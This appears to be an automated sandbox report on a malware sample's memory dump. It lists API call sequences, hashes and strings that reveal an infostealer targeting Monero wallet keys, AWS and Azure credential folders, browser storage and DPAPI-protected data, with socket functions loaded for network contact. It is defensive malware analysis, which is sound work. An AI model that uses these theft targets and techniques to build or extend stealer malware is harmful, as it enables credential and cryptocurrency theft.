                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: a9ed099a285b492ef1eca773c2781c105987bb8174e160f4e95d5f2add72dee9
                                • Instruction ID: c53d6c644b69005c123ff830206c15cfdf72da24a0679078696cacf8fde84a76
                                • Opcode Fuzzy Hash: a9ed099a285b492ef1eca773c2781c105987bb8174e160f4e95d5f2add72dee9
                                • Instruction Fuzzy Hash: 40016DB5E41309ABD7109BA4DC49FAFB778EB44B00F104254FA00BB285D7B59E00CBE4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'l?o$isw~
                                • API String ID: 0-3545199178
                                • Opcode ID: 76a4d84ef2178ee8a73e69d648002b9da5067b7c3f00506792bc6dcd2f0caf87
                                • Instruction ID: 50bd68cbcd0ac3d421f22114c17c73e5bb808c8320b683166bedda107e82b847
                                • Opcode Fuzzy Hash: 76a4d84ef2178ee8a73e69d648002b9da5067b7c3f00506792bc6dcd2f0caf87
                                • Instruction Fuzzy Hash: 0E7219F3608204AFE304AE2DEC8577BFBE9EF94620F1A453DEAC5C3744E53598018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _}$_}
                                • API String ID: 0-2228023342
                                • Opcode ID: 5f09ae21cca51a11d863d21bb6476f817202b680737173b7b3e89fe73e4b7a31
                                • Instruction ID: 7feebed3acf8cc82d7bb0fb13186c39a034da793e854be7ace721061a8c587bd
                                • Opcode Fuzzy Hash: 5f09ae21cca51a11d863d21bb6476f817202b680737173b7b3e89fe73e4b7a31
                                • Instruction Fuzzy Hash: E35129F3E182185FE348593DDC85376B6CAE7D4320F2A823DAE44E7788EC7A5D054195
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: t>$xPIz
                                • API String ID: 0-123843675
                                • Opcode ID: c7216f71dc93dafce258c2607a8faf42629a45c331863bd423bc0a4568d7bf64
                                • Instruction ID: 3814509501e80d8149de8f292d709b31eab9b62f73f43216265973ca1d0b652d
                                • Opcode Fuzzy Hash: c7216f71dc93dafce258c2607a8faf42629a45c331863bd423bc0a4568d7bf64
                                • Instruction Fuzzy Hash: 8C6156B3A186044FE748AE3DEC1533AB7DAEF90310F25863DE5C2C7784EA7998058346
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tQa}
                                • API String ID: 0-4197841719
                                • Opcode ID: a439e549bc61bc5a1fe26b706eeeba8f6ebaff1bc2d0c8fb72fb6e9a47172106
                                • Instruction ID: 400d7901c485b0dbd675c78e88e9928e10c65cfd366deee3940f2e297a23600a
                                • Opcode Fuzzy Hash: a439e549bc61bc5a1fe26b706eeeba8f6ebaff1bc2d0c8fb72fb6e9a47172106
                                • Instruction Fuzzy Hash: 9C6138F3D082245BF3106A19DC457B6BAD5DB94720F1A863DEEC8A7780E9795C0582C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [_
                                • API String ID: 0-3476257853
                                • Opcode ID: 4ccf661f07eb9fe06468ae3ce112160bdd167de5cc1831a017f2f09e5073fc36
                                • Instruction ID: 21bf62ae3faea9762c1a491823fb1b6807491a7d839b27fe41036616faaaa0ce
                                • Opcode Fuzzy Hash: 4ccf661f07eb9fe06468ae3ce112160bdd167de5cc1831a017f2f09e5073fc36
                                • Instruction Fuzzy Hash: 0C5122F3B096004BF3486A29ECA43B676C6EB94320F2B853DD7C8877C4ED7D58454286
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02d19e171d82e77a035015c266808bfd472c8262ecc477f9f95d3f83d7ef2fea
                                • Instruction ID: c67c2bad5d808cb9af4cc744c70b002fe2b4d1688ed4ca070464f62941cb931d
                                • Opcode Fuzzy Hash: 02d19e171d82e77a035015c266808bfd472c8262ecc477f9f95d3f83d7ef2fea
                                • Instruction Fuzzy Hash: 9951F8F3B056045FE3006D3DDC8576ABBDADBE4621F2A863DD6D4C37C8E93584058652
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6be0f015ee98c018677d6a351031284feeae12d6047c2e465f7244b07b8cdb9a
                                • Instruction ID: 3e29a4ed90b1342e6017522154b4d71dba0b266e164610d4355ccf2c766d0d02
                                • Opcode Fuzzy Hash: 6be0f015ee98c018677d6a351031284feeae12d6047c2e465f7244b07b8cdb9a
                                • Instruction Fuzzy Hash: 50311AB251C304DFD711BF29DC8166EFBE5EF98710F06492EE6D483250E771A8448A97
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 00E58636
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5866D
                                • lstrcpy.KERNEL32(?,00000000), ref: 00E586AA
                                • StrStrA.SHLWAPI(?,016CE9C0), ref: 00E586CF
                                • lstrcpyn.KERNEL32(010793D0,?,00000000), ref: 00E586EE
                                • lstrlen.KERNEL32(?), ref: 00E58701
                                • wsprintfA.USER32 ref: 00E58711
                                • lstrcpy.KERNEL32(?,?), ref: 00E58727
                                • StrStrA.SHLWAPI(?,016CE9F0), ref: 00E58754
                                • lstrcpy.KERNEL32(?,010793D0), ref: 00E587B4
                                • StrStrA.SHLWAPI(?,016CEC78), ref: 00E587E1
                                • lstrcpyn.KERNEL32(010793D0,?,00000000), ref: 00E58800
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                                • String ID: %s%s
                                • API String ID: 2672039231-3252725368
                                • Opcode ID: bb69db7f749989f6e496849832759145453c766032425fffb8c305de38912ae6
                                • Instruction ID: 0badbe7dbb1602e05af90707ae7eb01227d94d0cece33071555a01ae53c724f2
                                • Opcode Fuzzy Hash: bb69db7f749989f6e496849832759145453c766032425fffb8c305de38912ae6
                                • Instruction Fuzzy Hash: 0BF15A71E04118EFCB20DB64DD4CA9AB7B9EF88314F109559FA49F7244DB35AE04CBA1
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41F9F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E41FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41FE3
                                • lstrlen.KERNEL32(00E71794), ref: 00E41FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4200E
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E42042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4204D
                                • lstrlen.KERNEL32(00E71794), ref: 00E42058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42075
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42081
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E420AC
                                • lstrlen.KERNEL32(?), ref: 00E420E4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42104
                                • lstrcat.KERNEL32(00000000,?), ref: 00E42112
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42139
                                • lstrlen.KERNEL32(00E71794), ref: 00E4214B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4216B
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42177
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4219D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E421A8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E421D4
                                • lstrlen.KERNEL32(?), ref: 00E421EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4220A
                                • lstrcat.KERNEL32(00000000,?), ref: 00E42218
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42242
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4227F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4228D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E422B1
                                • lstrcat.KERNEL32(00000000,016CD8E0), ref: 00E422B9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E422F7
                                • lstrcat.KERNEL32(00000000), ref: 00E42304
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4232D
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E42356
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42382
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423BF
                                • DeleteFileA.KERNEL32(00000000), ref: 00E423F7
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E42444
                                • FindClose.KERNEL32(00000000), ref: 00E42453
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                                • String ID:
                                • API String ID: 2857443207-0
                                • Opcode ID: caa87e68dc56b9c4db58cb13352550e495e8727ac6afeafe0d5accc06c8816c8
                                • Instruction ID: 4f230b223e1ae32be9d81c5357500fd03f7b83856400918b3e426e6432b6a79d
                                • Opcode Fuzzy Hash: caa87e68dc56b9c4db58cb13352550e495e8727ac6afeafe0d5accc06c8816c8
                                • Instruction Fuzzy Hash: 68E16031A112069BCB21EF64FC89AAE77F9AF44304F846069FA45B7305DB35ED45CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56445
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E56480
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E564AA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E564E1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56506
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5650E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E56537
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FolderPathlstrcat
                                • String ID: \..\
                                • API String ID: 2938889746-4220915743
                                • Opcode ID: 7b1b84f6563765a0afa1752a7fdd4ed3cc31be7595e0324e005772040e53d258
                                • Instruction ID: d8cffcaa6fe553ca21b76674fe509004b2b60e87168cefef7b34760e88dc268e
                                • Opcode Fuzzy Hash: 7b1b84f6563765a0afa1752a7fdd4ed3cc31be7595e0324e005772040e53d258
                                • Instruction Fuzzy Hash: D2F19070E102059FCB21AF68E849AAE77F4AF44319F84A928FD55F7245DB38DC49CB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E543A3
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E543D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E543FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54409
                                • lstrlen.KERNEL32(\storage\default\), ref: 00E54414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 00E5443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54498
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E544D7
                                • lstrcat.KERNEL32(00000000,?), ref: 00E544DF
                                • lstrlen.KERNEL32(00E71794), ref: 00E544EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54507
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E54513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 00E5451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00E54547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E545A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E545A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54601
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E54653
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5467B
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E546AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 26cc52fb75f5f0b3e86220514509067db0153b648050f9274060d15e0fa68bf6
                                • Instruction ID: 4f9bfbfee3cc97896f196a13acbe7c7d502d3b7e8e16f74966d3bdc77737d6f8
                                • Opcode Fuzzy Hash: 26cc52fb75f5f0b3e86220514509067db0153b648050f9274060d15e0fa68bf6
                                • Instruction Fuzzy Hash: 63B1B2B1A112059BCB21EF78E849AAF77E8AF04309F446428FD85F7381DB34DD458BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E557D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E55804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E558C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E558D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E558F8
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E5592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55988
                                • lstrlen.KERNEL32(00E71794), ref: 00E5599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E559B9
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E559C5
                                • lstrlen.KERNEL32(016CD838), ref: 00E559D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E559F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E55A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E55A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55BB5
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E55BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E55C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E55C70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: a17d9e97e825f58b5b719bfd3cf267f70880d26aa21035a4c67770dba03588ae
                                • Instruction ID: f322c67836812857c94dd9ed1015072e4159d9bfa57a68ddfa31502baa9fc9bc
                                • Opcode Fuzzy Hash: a17d9e97e825f58b5b719bfd3cf267f70880d26aa21035a4c67770dba03588ae
                                • Instruction Fuzzy Hash: 9D02EF72A106059FCB21EF68E899AAE7BF4AF48315F54692CFD45B3301DB34DC498B90
                                APIs
                                  • Part of subcall function 00E41120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E41135
                                  • Part of subcall function 00E41120: RtlAllocateHeap.NTDLL(00000000), ref: 00E4113C
                                  • Part of subcall function 00E41120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00E41159
                                  • Part of subcall function 00E41120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00E41173
                                  • Part of subcall function 00E41120: RegCloseKey.ADVAPI32(?), ref: 00E4117D
                                • lstrcat.KERNEL32(?,00000000), ref: 00E411C0
                                • lstrlen.KERNEL32(?), ref: 00E411CD
                                • lstrcat.KERNEL32(?,.keys), ref: 00E411E8
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4121F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41251
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E41259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00E41264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00E41294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E412BA
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E412FF
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41335
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41378
                                • lstrcat.KERNEL32(00000000), ref: 00E41385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E413AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00E413D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41401
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4143D
                                  • Part of subcall function 00E5EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00E5EE12
                                • DeleteFileA.KERNEL32(?), ref: 00E41471
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: 79df1a29291beeb596bbd728a95ecc70382a5c2540af5105b2959bb4224d3fd5
                                • Instruction ID: 4d5258ed2bae988482b7aac1413f8dfef7610cf45e58254b9bdd1975c24a47c7
                                • Opcode Fuzzy Hash: 79df1a29291beeb596bbd728a95ecc70382a5c2540af5105b2959bb4224d3fd5
                                • Instruction Fuzzy Hash: 76A15E71E10205ABCB21EF64FC89AAE7BF9AF44354F446068FA45F7241DB34ED418BA4
                                APIs
                                • memset.MSVCRT ref: 00E5E740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E5E769
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E79F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00E5E7C6
                                • memset.MSVCRT ref: 00E5E805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00E5E82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E85F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00E5E886
                                • memset.MSVCRT ref: 00E5E8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E5E8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5E920
                                • lstrcat.KERNEL32(?,00000000), ref: 00E5E92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E5E947
                                • memset.MSVCRT ref: 00E5E986
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: d72b2d2de4a076f0e1b87c5220b42e4d7b3a88093b26ee79c766697df2cd48d4
                                • Instruction ID: a01c229d30f7a215c0383cd44005836f9c0fbe89f99990106c6dc1988cd21f5c
                                • Opcode Fuzzy Hash: d72b2d2de4a076f0e1b87c5220b42e4d7b3a88093b26ee79c766697df2cd48d4
                                • Instruction Fuzzy Hash: 1B711B71E50218AFDB25EB64DC46FED77B4AF48300F405898BB19BB2C1DB749B448B94
                                APIs
                                • lstrcpy.KERNEL32 ref: 00E5ABCF
                                • lstrlen.KERNEL32(016CEB28), ref: 00E5ABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ACB7
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E5ACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ACF3
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E5ACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD28
                                • lstrlen.KERNEL32(00E74AD4), ref: 00E5AD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD5C
                                • lstrcat.KERNEL32(00000000,00E74AD4), ref: 00E5AD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AD91
                                • lstrlen.KERNEL32(016CEBD0), ref: 00E5ADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5ADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5ADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5AE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E5AE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5AE6F
                                • lstrlen.KERNEL32(00000000), ref: 00E5AE85
                                • lstrcpy.KERNEL32(00000000,016CEB58), ref: 00E5AEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: 458ef7f273e72959a5b4f1cc927c8b00b9bd436fa67fd653a5785f97b59ffe68
                                • Instruction ID: f74a5a36f1a0b6fc639e34e8bd664e59168b35792530e3e51eb092766b7d7db9
                                • Opcode Fuzzy Hash: 458ef7f273e72959a5b4f1cc927c8b00b9bd436fa67fd653a5785f97b59ffe68
                                • Instruction Fuzzy Hash: 8CB190309101169BCB32EF68EC49AAFB3B5AF4430AF486938BD45B7245DB35DD05CBA1
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,00E572A4), ref: 00E647E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 00E647FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 00E6480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00E6481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 00E6482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00E64840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 00E64851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 00E64862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00E64873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00E64884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 00E64895
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 812668cc6270bf7f6ee11fe8b81e137d61c0015473f75af3ba2417dc706d83de
                                • Instruction ID: fbfb0ee01ca67f183e1f9778a30c64a6e2d08b595243b0a9b726edd5d3a36b0f
                                • Opcode Fuzzy Hash: 812668cc6270bf7f6ee11fe8b81e137d61c0015473f75af3ba2417dc706d83de
